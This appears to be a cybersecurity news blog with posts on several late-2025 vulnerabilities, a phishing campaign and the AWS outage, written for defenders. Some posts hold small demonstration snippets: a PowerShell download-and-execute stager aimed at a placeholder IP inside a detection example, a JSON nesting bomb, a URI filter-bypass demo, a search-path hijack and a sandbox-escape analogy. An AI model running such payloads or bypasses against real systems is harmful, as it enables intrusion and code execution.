Category: Cyber News

  • RasMan RPC race condition lets local actors run code as SYSTEM

    A critical elevation-of-privilege vulnerability in the Windows Remote Access Connection Manager (RasMan) can be weaponized by a local attacker to execute arbitrary code with SYSTEM privileges. The flaw centers on RasMan’s handling of RPC endpoints: if an attacker can register the trusted endpoint before RasMan does, privileged services may later communicate with the attacker’s process instead of the real service, enabling arbitrary command execution as SYSTEM.

    The exploit chain reported against this issue is notable because it combines two conditions. The primary, patched flaw (CVE-2025-59230) is the endpoint-registration race that enables privilege escalation when the attacker controls the endpoint first. In practice, however, RasMan normally starts at boot and registers that endpoint early, so the race window is small. To overcome this, researchers observed a second, previously undocumented crash vector: a logic error that can be triggered to intentionally crash RasMan, stop the service, and free the RPC endpoint so the attacker can register it and complete the exploitation chain.

    Technical summary

    RasMan registers an RPC endpoint that other privileged services trust. When that registration can be preempted, privileged inter-process communications may be redirected to an attacker-controlled process. The secondary crash vector involves a circular linked-list traversal where NULL pointers are not handled correctly, producing a memory-access violation that can crash RasMan and create the opportunity for endpoint re-registration. Because the two issues are used together in the observed exploit chain, full exploitation requires both the race-condition behavior and the ability to reliably stop the service first.
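
    The squatting pattern described above can be illustrated with an ordinary localhost socket, where whichever process binds the address first receives the traffic. This is only an analogy: nothing below touches Windows RPC, and the port, roles, and messages are invented for illustration.

```python
import socket

# 1. The "service" registers the trusted endpoint (binds a localhost port).
service = socket.socket()
service.bind(("127.0.0.1", 0))
service.listen(1)
port = service.getsockname()[1]  # the well-known address clients will trust

# 2. A triggered crash stops the service and frees the endpoint.
service.close()

# 3. The "attacker" re-registers the same endpoint before the service restarts.
attacker = socket.socket()
attacker.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
attacker.bind(("127.0.0.1", port))
attacker.listen(1)

# 4. A privileged "client" connects to the well-known endpoint address
#    and reaches the attacker instead of the real service.
client = socket.socket()
client.connect(("127.0.0.1", port))
conn, _ = attacker.accept()
conn.sendall(b"attacker-controlled reply")
reply = client.recv(64)
print(reply)

conn.close()
client.close()
attacker.close()
```

    The sketch also shows why the crash vector matters: without a way to free the endpoint first, step 3 never gets a window.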

    Mitigations

    Microsoft issued official patches addressing the elevation-of-privilege weakness (CVE-2025-59230) as part of the October 2025 security updates. At the time the issue was publicly described, the crash-trigger used to facilitate the attack had not been addressed in Microsoft’s official updates; a third party released micropatches targeting that crash vector across supported platforms. Administrators should apply the October 2025 updates immediately and evaluate whether supplemental mitigations or third-party micropatches are necessary in environments where the crash vector would materially increase risk.

    Recommendations

    Prioritize deployment of the vendor-supplied updates for CVE-2025-59230 across endpoints and servers. Where rapid patching is constrained, consider compensating controls that reduce the risk of local, unprivileged users being able to execute code (for example, strict local user privilege management, application control, and endpoint monitoring for unexpected service crashes and suspicious RPC registrations). Log and alert on unusual RasMan start/stop activity and on processes that register RPC endpoints typically owned by system services.

    Final note

    The primary flaw was addressable through standard vendor patching, but the presence of a companion crash vector shows the necessity of defense in depth, combining timely patching, principle-of-least-privilege controls, and robust monitoring. Automated or out-of-cycle mitigations are valuable when attack chains rely on secondary, unpatched behaviors; however, long-term risk is best reduced by eliminating the underlying code defects in the trusted service.

  • React2Shell RCE: Active Exploitation of Unsafe Deserialization in Server Components

    It is another Monday, and unfortunately, we are starting the week with a critical development in the application security landscape. A new Remote Code Execution (RCE) vulnerability, which we are tracking as CVE-2025-55182 or “React2Shell,” has moved from theoretical risk to active exploitation in the wild. This isn’t just a minor patch warning; it involves a fundamental unsafe deserialization flaw within the React Server Components Flight protocol, effectively opening the door for unauthenticated attackers to execute arbitrary code on affected systems. If you are running React or downstream ecosystems like Next.js, this needs to be at the top of your triage list today.

    The Industrialization of Exploitation

    What strikes me most about the telemetry from researchers at GreyNoise is the speed and automation of these attacks. We aren’t seeing manual, tentative poking at firewalls here. Instead, the data reveals a highly automated, opportunistic campaign. Attackers are leveraging botnets—including evolutions of the notorious Mirai—to scan for this vulnerability at scale. The traffic patterns are distinctively non-organic; the fingerprints of the TCP stacks and HTTP clients scream “automation” rather than human browsing.

    Deconstructing the Attack Chain

    The exploitation chain observed in the field typically begins with unauthenticated probes against the Flight protocol surface, followed by small proof-of-execution commands. Successful probes are followed by encoded PowerShell stagers, which commonly use reflection and AMSI-evasion primitives. Network telemetry often shows requests from diverse ASNs and IPs concentrated in several regions, and telemetry platform signatures include Go-http-client and various scanner user agent strings. On endpoints, defenders should prioritize detection of PowerShell process creation with encoded command arguments, unusual use of DownloadString/IEX, and script blocks containing AMSI-bypass markers.
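
    On the endpoint side, those detection priorities can be sketched as a simple triage heuristic. This is a hedged illustration, not a production rule: the marker list and the helper name suspicious_markers are my own, and real detection content should be tuned per environment.

```python
import base64
import re

# Heuristic markers for the activity described above; tune per environment.
SUSPICIOUS = re.compile(
    r"(-enc(?:odedcommand)?\b|downloadstring|\biex\b|invoke-expression|amsiutils)",
    re.IGNORECASE,
)

def suspicious_markers(cmdline: str) -> list[str]:
    """Return suspicious markers found in a process command line.

    -EncodedCommand payloads (base64 of UTF-16LE) are decoded so markers
    hidden inside the encoded stager are caught as well.
    """
    hits = [m.group(0).lower() for m in SUSPICIOUS.finditer(cmdline)]
    enc = re.search(r"-enc(?:odedcommand)?\s+([A-Za-z0-9+/=]+)", cmdline, re.IGNORECASE)
    if enc:
        try:
            decoded = base64.b64decode(enc.group(1)).decode("utf-16-le", "ignore")
            hits += [m.group(0).lower() for m in SUSPICIOUS.finditer(decoded)]
        except ValueError:
            pass  # malformed base64: keep the -enc hit alone
    return hits

# Example: an encoded download-and-execute one-liner (URL is a placeholder).
stager = "IEX (New-Object Net.WebClient).DownloadString('http://198.51.100.7/a.ps1')"
b64 = base64.b64encode(stager.encode("utf-16-le")).decode()
hits = suspicious_markers(f"powershell.exe -NoProfile -EncodedCommand {b64}")
print(hits)  # includes '-encodedcommand', 'iex', 'downloadstring'
```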

    Practical mitigation and response priorities

    Organizations running React Server Components or frameworks that consume them must treat this vulnerability as high priority. The primary steps are straightforward: apply vendor patches or mitigations for the Flight protocol, restrict public exposure of server component endpoints where possible, and harden detection and containment controls. On the detection side, blocklists that target the campaign’s observed IPs and JA3/JA4 fingerprints can reduce noisy exploitation attempts, while endpoint telemetry should be tuned to flag the characteristic PowerShell validation and encoded-stager activity described above. Incident responders should also be prepared to triage signs of post-exploitation activity commonly associated with automated botnets and commodity toolkits.

    Monitoring and threat intelligence recommendations

    Continuous monitoring of server logs for unusual POSTs against server component endpoints, rapid repeat attempts with arithmetic-style commands, and spikes in small deterministic responses are useful early indicators. Enriching alerts with ASN and user-agent fingerprinting, and integrating threat feeds that capture the campaign’s IP infrastructure, will improve automated blocking and analyst triage. Because attackers have been observed integrating exploit code into botnet toolsets, defenders should assume opportunistic re-use across varying threat actors and prepare for follow-on lateralization attempts if a host is compromised.

    Final thoughts

    I view React2Shell as a clear example of how modern web-framework features can expand an application’s attack surface when unsafe deserialization is present. The exploitation activity is opportunistic and automated, which means the risk grows quickly for internet-exposed services that lag on updates. Organizations should assume that simple, reproducible probes will appear in their logs and prioritize patching, exposure reduction, and detection rules that focus on the small, telltale PowerShell validations and encoded stagers seen in the wild. Treating this as an urgent operational task will materially reduce the likelihood of successful compromise.

  • Critical Flaw in Apache bRPC Framework (CVE-2025-59789)

    This week, I want to dive into a pretty serious vulnerability that just dropped. It involves the Apache bRPC framework. If you’re into backend development, this is a textbook example of how a simple parsing flaw can turn into a major security incident.

    CVE-2025-59789 is a security vulnerability discovered in the Apache bRPC framework, carrying a CVSS score of 9.8 (Critical). This network-based flaw could permit a remote attacker to mount a denial-of-service (DoS) attack.

    Technical Analysis

    The vulnerability is rooted in the json2pb component, which converts JSON data into Protocol Buffer messages. This component relies on the rapidjson parser, which utilizes a recursive parsing method by default.

    The flaw is classified as Uncontrolled Recursion / Stack Overflow. An attacker can submit their own JSON data containing a deeply nested recursive structure. When the rapidjson parser attempts to process this input, the recursive function calls rapidly exhaust the available stack space, leading to a stack overflow. This results in an immediate crash of the bRPC server, which would lead to a DoS.
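
    Python’s json module happens to use a recursive parser too, so it can stand in for rapidjson to show the failure mode, along with the kind of pre-parse depth cap the fix introduces. The default limit of 100 mirrors bRPC’s json2pb_max_recursion_depth, but the json_depth_ok helper is my own sketch, not bRPC code.

```python
import json

def json_depth_ok(raw: str, max_depth: int = 100) -> bool:
    """Iteratively scan raw JSON and reject nesting deeper than max_depth.

    String contents are skipped so brackets inside literals don't count.
    """
    depth, in_string, escaped = 0, False, False
    for ch in raw:
        if in_string:
            if escaped:
                escaped = False
            elif ch == "\\":
                escaped = True
            elif ch == '"':
                in_string = False
        elif ch == '"':
            in_string = True
        elif ch in "[{":
            depth += 1
            if depth > max_depth:
                return False
        elif ch in "]}":
            depth -= 1
    return True

# A recursive parser exhausts the stack on deeply nested input...
bomb = "[" * 50_000 + "]" * 50_000
try:
    json.loads(bomb)
except RecursionError:
    print("parser hit the recursion limit")

# ...but a depth guard rejects the payload before parsing begins.
print(json_depth_ok(bomb))          # False
print(json_depth_ok('{"a": [1]}'))  # True
```

    (CPython raises RecursionError instead of crashing outright; a C++ parser recursing on the native stack has no such safety net, hence the hard crash in bRPC.)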

    Risk Assessment

    The vulnerability affects all versions of Apache bRPC before 1.15.0. Organizations that use this framework face a critical risk if their deployments meet the following criteria:

    • Running a bRPC server configured to handle HTTP+JSON requests that originate from untrusted external networks.
    • Employing the JsonToProtoMessage function to convert JSON data derived from any unvalidated or untrusted input source.

    Required Action

    Apache has provided definitive steps to remediate this vulnerability. Security teams are strongly advised to apply one of the following countermeasures immediately:

    1. Upgrade: Update the Apache bRPC framework to version 1.15.0 or higher, which includes the security fix.
    2. Patch: In any environment unable to execute a full version upgrade, apply the official patch made available on the Apache GitHub repository.

    Both mitigation options introduce a recursion depth limit to the parsing process, with a default value of 100. This boundary is applied to key conversion functions, including JsonToProtoMessage. Any incoming JSON or Protocol Buffer messages that exceed this depth limit will be rejected, which would prevent the stack exhaustion condition. Administrators requiring a greater recursion depth for specific operational requirements may have to manually adjust this parameter via the json2pb_max_recursion_depth gflag.

  • Oracle Identity Manager RCE Vulnerability

    Organizations are being alerted by the Cybersecurity & Infrastructure Security Agency (CISA) about a critical security flaw in Oracle Identity Manager that requires immediate attention. The vulnerability — tracked as CVE‑2025‑61757 — allows unauthenticated attackers to execute arbitrary code on affected systems, which could lead to a full-scale compromise of enterprise or government networks.

    It turns out this issue was discovered by researchers at Searchlight Cyber while they were analyzing the attack surface of Oracle Cloud Login. They found that the same software stack behind that earlier massive breach contained this serious flaw.

    How It Happened

    The root cause lies in a misconfigured authentication filter, the SecurityFilter declared in the application’s web.xml. The developers meant to allow certain unauthenticated access (to WADL files, via a regular-expression whitelist), but they overlooked how Java application servers treat request URIs with matrix parameters. Attackers can append something like ;.wadl to a URI, fooling the filter into treating the request as a harmless WADL retrieval while the servlet layer processes it as a privileged API call. That bypass allows access to restricted REST endpoints without credentials.
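
    The bypass is easiest to see side by side: the filter matches the raw request URI, while the servlet container routes on the path with matrix parameters stripped. The regex and URI below are illustrative reconstructions, not Oracle’s actual configuration.

```python
import re

# Hypothetical allow-list: requests for WADL descriptors skip authentication.
WADL_ALLOWED = re.compile(r"\.wadl$", re.IGNORECASE)

def filter_allows_unauthenticated(request_uri: str) -> bool:
    """The flawed behaviour: check the allow-list against the raw URI."""
    return bool(WADL_ALLOWED.search(request_uri))

def resource_actually_served(request_uri: str) -> str:
    """The servlet layer strips matrix parameters (';key=value') from each
    path segment, so ';.wadl' vanishes before routing."""
    return "/".join(seg.split(";", 1)[0] for seg in request_uri.split("/"))

uri = "/iam/governance/api/v1/applications;.wadl"  # illustrative path
print(filter_allows_unauthenticated(uri))  # True: the filter waves it through
print(resource_actually_served(uri))       # the privileged endpoint, no '.wadl'
```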

    Once authentication is bypassed, an attacker can access endpoints like groovyscriptstatus, which were intended only for syntax checking of Groovy scripts. Because the endpoint performs compilations, the attacker can inject a script that uses the @ASTTest annotation to trigger arbitrary code execution during compile time — effectively granting them a full remote shell.

    This is particularly dangerous: an attacker needs no valid credentials, just the vulnerable application exposed, and then they can remotely execute code. That makes this extremely appealing for ransomware groups or state-sponsored actors.

    If you’re running Oracle Identity Governance Suite 12c (version 12.2.1.4.0) or similar, apply Oracle’s patch as soon as possible, or, until you can, isolate affected systems from the internet to avoid full system compromise.

  • Cisco Catalyst Center Vulnerability

    A critical security flaw has been discovered in the Cisco Catalyst Center Virtual Appliance (running on VMware ESXi) that allows attackers with relatively low permissions to escalate their access to full administrator level. According to the advisory, this vulnerability is tracked as CVE-2025-20341 and carries a high severity, with a CVSS score of 8.8.

    The root cause of this vulnerability is poor input validation: the appliance doesn’t properly sanitize HTTP requests, so an attacker can submit specially crafted data that tricks the system into elevating privileges. What’s especially concerning is how easily it can be exploited: someone with only Observer-level credentials—just read-only access—can leverage this bug to gain Administrator rights.

    Once an attacker becomes an administrator, they can do practically anything: create new user accounts, change system settings, or otherwise undermine the network’s security posture.

    Cisco identified the issue internally while working on a support case. They have released a fix: version 2.3.7.10-VA of the virtual appliance patches the flaw, and users who are running affected versions (2.3.7.3-VA and later) should update immediately. Notably, hardware appliances and AWS-based virtual appliances are not affected by this particular issue.

    Unfortunately, there are no workarounds — the only way to secure systems is to apply the software update.

    What I Think About This

    I believe this vulnerability is very serious. Giving an “Observer” the ability to escalate to admin is a major misstep, especially in network-management tools where administrator access usually means full control over configurations.

    On the upside, Cisco has already addressed the issue with a specific fixed version, which shows that they took the risk seriously. But still, any delay in updating could leave critical infrastructure exposed. So, in my view, if you’re using Catalyst Center Virtual Appliance, you need to act now and deploy the patch.

  • NVIDIA App for Windows Vulnerability — Why You Should Update Now

    There’s a serious vulnerability in the NVIDIA App for Windows that I feel is important to pass along. The flaw is tracked as CVE‑2025‑23358 and affects the installer component of the app. Essentially, if someone has even low-privileged local access to a machine running an affected version of the NVIDIA App, they could exploit the search-path logic to inject malicious code and escalate privileges on the system.

    What the issue is

    The problem is an uncontrolled search-path vulnerability (classified under CWE‑427) in the NVIDIA App installer. By manipulating how the installer locates modules or executables via its search path, an attacker with local access can trick the system into running malicious code. The requirements are local access plus a bit of user interaction, but once successful, the result is full code execution and the ability to elevate privileges.
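
    The general CWE‑427 pattern is easy to demonstrate: if a program launches a helper by bare name, search-path order decides which binary runs, so an attacker-writable directory earlier in the path wins. The POSIX sketch below uses Python’s shutil.which as a stand-in for the platform loader’s resolution; the directories and the "helper" tool are invented.

```python
import os
import shutil
import stat
import tempfile

# Simulate an installer that launches a helper tool by bare name,
# letting search-path order decide which binary actually runs (CWE-427).
with tempfile.TemporaryDirectory() as planted, tempfile.TemporaryDirectory() as legit:
    for d, marker in ((planted, "attacker"), (legit, "vendor")):
        helper = os.path.join(d, "helper")
        with open(helper, "w") as f:
            f.write(f"#!/bin/sh\necho {marker}\n")
        os.chmod(helper, os.stat(helper).st_mode | stat.S_IEXEC)

    # Attacker-writable directory listed before the vendor directory:
    search_path = os.pathsep.join([planted, legit])
    resolved = shutil.which("helper", path=search_path)
    hijacked = resolved is not None and resolved.startswith(planted)
    print(hijacked)  # True: the planted binary shadows the legitimate one
```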

    This vulnerability got a base CVSS v3.1 score of 8.2, which puts it in the “High” severity range. Because of the low complexity of the attack and the way it affects installations that often run with elevated rights, it’s especially risky in shared or enterprise environments.

    If you’re running a version of the NVIDIA App for Windows that is before version 11.0.5.260, you are exposed. The installer component is vulnerable until you apply the patch.

    What you should do

    I recommend updating immediately to version 11.0.5.260 or later of the NVIDIA App. Make sure you get it from the official NVIDIA site. If you’re managing multiple workstations (especially in a corporate setting), you should check your software inventory to find any systems still running the older version and push the update out quickly.

    It’s easy to overlook utilities such as the NVIDIA App as “just extra” software, but installers and their elevated execution context are common targets for attackers. This incident reinforces the importance of keeping all software—especially those with high privileges—up to date and audited.

  • Multilingual ZIP File Phishing Campaign Targets Asia

    While digging through some recent cybersecurity reports, I came across a fascinating and concerning campaign. Threat actors have been running a large-scale phishing operation using multilingual ZIP files to target organizations across East and Southeast Asia. It wasn’t just random spam — it was coordinated, multilingual, and very calculated.

    They used Traditional Chinese, English, and Japanese to tailor their attacks to each region. The emails and web templates were customized to look as authentic as possible, depending on who they were targeting. It’s one of those times where I realize how advanced phishing operations have become — they feel more like marketing campaigns than old-school scams.

    How the Attack Spread

    At first, the attackers focused on Taiwan. They pretended to be the country’s Ministry of Finance and sent out fake PDFs hosted on cloud platforms. Eventually, they leveled up by creating their own infrastructure, registering domains that looked official — often ending in “.tw” — and expanding their reach into Japan and other Southeast Asian countries.

    They used clever tricks to avoid detection. When someone landed on their fake website, a hidden script called visitor_log.php would quietly collect information about the visitor — things like IP address and browser type. Only after that would a download button appear, leading to a ZIP file that seemed harmless but contained malicious content. The way they designed it made it almost invisible to most filters.

    Inside the ZIP Files

    The files inside these ZIP archives were disguised to look like everyday business documents. They had names like “Payroll Report,” “Tax Summary,” or “Financial Confirmation.” On the surface, they appeared professional and legitimate, which helped them bypass many content-based filters and fool even cautious employees.

    Another detail that stood out to me was how these phishing pages all seemed to share the same structure. The same file names kept appearing across multiple sites — download.php, visitor_log.php, and others — suggesting that all of them were powered by a shared backend or some kind of phishing kit. It’s like the attackers had created a framework they could deploy anywhere, in any language.
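
    Those recurring kit artifacts are also a convenient hunting signal. A minimal sketch, assuming combined-format access logs and using the file names reported for this campaign (the kit_hits helper and the sample lines are my own):

```python
import re

# File names reused across the campaign's sites (shared phishing kit).
KIT_PATHS = ("/visitor_log.php", "/download.php")

LOG_LINE = re.compile(r'"(?:GET|POST) (?P<path>\S+) HTTP/[\d.]+"')

def kit_hits(log_lines):
    """Return request paths in proxy/access logs that match known kit artifacts."""
    hits = []
    for line in log_lines:
        m = LOG_LINE.search(line)
        if m and any(m.group("path").split("?")[0].endswith(p) for p in KIT_PATHS):
            hits.append(m.group("path"))
    return hits

sample = [
    '1.2.3.4 - - [01/Nov/2025] "GET /index.html HTTP/1.1" 200 512',
    '5.6.7.8 - - [01/Nov/2025] "POST /visitor_log.php HTTP/1.1" 200 64',
    '5.6.7.8 - - [01/Nov/2025] "GET /download.php?id=9 HTTP/1.1" 200 2048',
]
print(kit_hits(sample))  # ['/visitor_log.php', '/download.php?id=9']
```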

    Distributed Hosting

    The infrastructure behind this campaign wasn’t limited to one region. The domains were hosted by a Hong Kong-based provider but spread across several major cities like Tokyo, Singapore, and Hong Kong. This distributed setup made it much harder for defenders to block the entire operation, since every time one domain went down, another one could easily take its place.

    My Opinion

    To me, this campaign really highlights how professional and methodical cybercriminals have become. They understand language, culture, and how to manipulate trust. What used to be simple, mass spam attacks have evolved into region-specific, data-driven phishing campaigns that can fool even experienced users.

    The use of multilingual content, customized ZIP files, and distributed hosting shows that these attackers are treating cybercrime like a global business. It’s efficient, adaptive, and hard to detect. I think this kind of operation is a glimpse into where phishing is headed — smarter, more targeted, and far more dangerous than before.

  • AWS Outage: What Really Happened and What We Can Learn From It

    What we talked about last week — that huge AWS outage — just got even more interesting.

    I’ve been following the story closely, and the scale of what happened really shows how dependent so many organizations are on Amazon’s cloud. Around the same time as the previous incident, AWS’s US-East-1 region experienced another massive disruption that rippled across countless apps, websites, and internal systems worldwide.

    It all started when DNS resolution issues within AWS’s own infrastructure caused services to fail at connecting properly. Basically, the system that tells computers where to find each other stopped working the way it should. Once that broke, the effects cascaded into other services like storage, databases, and computing instances.

    The Ripple Effect

    When something like this happens inside a provider as large as Amazon, it doesn’t just stay within their ecosystem. Businesses that depend on AWS for hosting, analytics, or even authentication suddenly find themselves offline. Streaming platforms, banking apps, e-commerce stores, and even schools felt the hit.

    Even though AWS resolved the issue within hours, the damage was already done — downtime, lost transactions, delayed services, and frustrated users everywhere.

    My Take on It

    This outage reinforced something I’ve always said: no system is too big to fail. Even a company with the resources and experience of Amazon can run into infrastructure breakdowns.

    That’s why redundancy and smart design matter so much. Relying on a single cloud region or provider is a recipe for disruption. I always recommend setting up multi-region backups, strong monitoring tools, and clear response plans so that when an outage hits, your operations don’t grind to a halt.

    Another key lesson is transparency — if your users are affected, communicate quickly. People are more forgiving when they’re informed.

    Final Thoughts

    Whether it’s a misconfiguration, an internal update, or something more serious, incidents like this remind us that resilience is just as important as performance. For me, it’s not about pointing fingers at AWS — it’s about learning from the chaos and using it to build systems that can withstand it.

    The cloud gives us incredible power and flexibility, but it also means we all share the same risks when something that big goes down.

  • AWS Outage Resolved After 24 Hours Of Disruption

    Everyone knows who Amazon is — they’re massive in cloud computing, hosting services for countless organizations globally, including schools. So when a company that big encounters a service disruption, it resonates widely. Here’s how the recent Amazon Web Services (AWS) outage was resolved:

    • On October 19, 2025, around 11:49 PM PDT, the US-East-1 region began showing elevated error rates and latency across multiple AWS services.
    • By 12:26 AM PDT the next day, the root cause had been traced to a faulty DNS update. This prevented applications from resolving server IPs — like a broken phonebook for the internet.
    • As a result, more than 100 AWS services were affected. Failures in the core database service DynamoDB in particular cascaded outward — for example, EC2 launches stalled, Lambda functions had issues, load balancer health checks failed.

    For users and system administrators, the ripple effects were visible everywhere: gaming platforms went offline, financial apps had login failures, and even Amazon’s own systems (like Prime Video and e-commerce checkout) saw disruption.

    How It Was Fixed

    Here’s what AWS did to bring the systems back online:

    • They flushed DNS caches and applied the fix for the core DynamoDB DNS issue by about 2:24 AM PDT.
    • They temporarily throttled some operations (for example, asynchronous Lambda invocations, EC2 instance launches) to stabilize dependent subsystems.
    • By around 3:01 PM PDT, AWS had confirmed that all services were fully restored, though some data-processing backlogs (for example in Redshift and Connect) remained to be cleared.

    Final Thoughts

    Contrary to what many people thought, this outage wasn’t caused by a cyberattack — rather, it appears to have been an internal update gone wrong.

    Still, it’s a vivid reminder: even the biggest cloud provider can experience a disruption, and when they do, many of us feel it. Thinking proactively about architectural resilience and dependent-service risk is more important than ever.

  • Happy DOM Vulnerability: 2.7 Million Users Exposed To Remote Code Execution Attacks

    I recently came across a serious security issue in Happy DOM, a popular JavaScript DOM implementation used by around 2.7 million users weekly. The flaw affects versions up to v19 and exposes systems to Remote Code Execution (RCE) risks.

    In my review, I found that Happy DOM’s Node.js VM context isn’t truly isolated. Because JavaScript evaluation (via eval() and Function()) is enabled by default, untrusted code can escape the sandbox. In other words, an attacker could craft malicious JavaScript that climbs the constructor chain and gains access to the process-level Function constructor, breaking out of the supposed safe environment.

    The type of module system (CommonJS vs ESM) matters here. In a CommonJS setup, the attacker might get access to the require() function, load Node.js modules, and perform unauthorized actions.
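
    The escape itself is specific to JavaScript and Happy DOM’s VM context, but the underlying idea, walking an object graph out of a restricted namespace, exists in most dynamic languages. As a Python analogy (not Happy DOM’s actual code):

```python
# A naive "sandbox": eval with builtins stripped from the namespace.
sandbox = {"__builtins__": {}}

# Benign expressions behave as expected...
print(eval("1 + 1", sandbox))  # 2

# ...but any literal still carries the full object graph. Climbing
# type -> base class -> subclasses reaches classes defined far outside
# the sandbox, much as the JS escape climbs .constructor chains to the
# process-level Function constructor.
escaped = eval("().__class__.__base__.__subclasses__()", sandbox)
print(len(escaped))  # hundreds of classes leak through on a stock CPython
```

    The lesson is the same in both languages: restricting the namespace handed to an evaluator does not isolate the objects reachable from it, which is why Happy DOM v20 disables evaluation by default rather than trying to harden the context.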

    This vulnerability is a major concern especially for server-side rendering (SSR) frameworks or any server that processes external HTML content. Here are some of the attack scenarios I identified:

    • Data exfiltration: The attacker could access environment variables, configuration files, secrets.
    • Lateral movement: If the compromised server has network access, internal systems could be reached.
    • Full code execution: Executing arbitrary commands by spawning child processes is possible.
    • Persistence: The attacker could modify the filesystem to keep long-term footholds inside the system.

    What to do

    Here are the steps I’m recommending:

    Disable evaluation: If an immediate update isn’t possible, turn off JavaScript evaluation unless you’re confident all processed content is fully trusted.

    Update: Move to Happy DOM version 20 or newer, which disables JavaScript evaluation by default and shows a warning if you turn it on in an insecure environment.

    Configuration: If you must keep JavaScript evaluation enabled, run Node.js with the --disallow-code-generation-from-strings flag. That blocks eval() and Function() at the process level.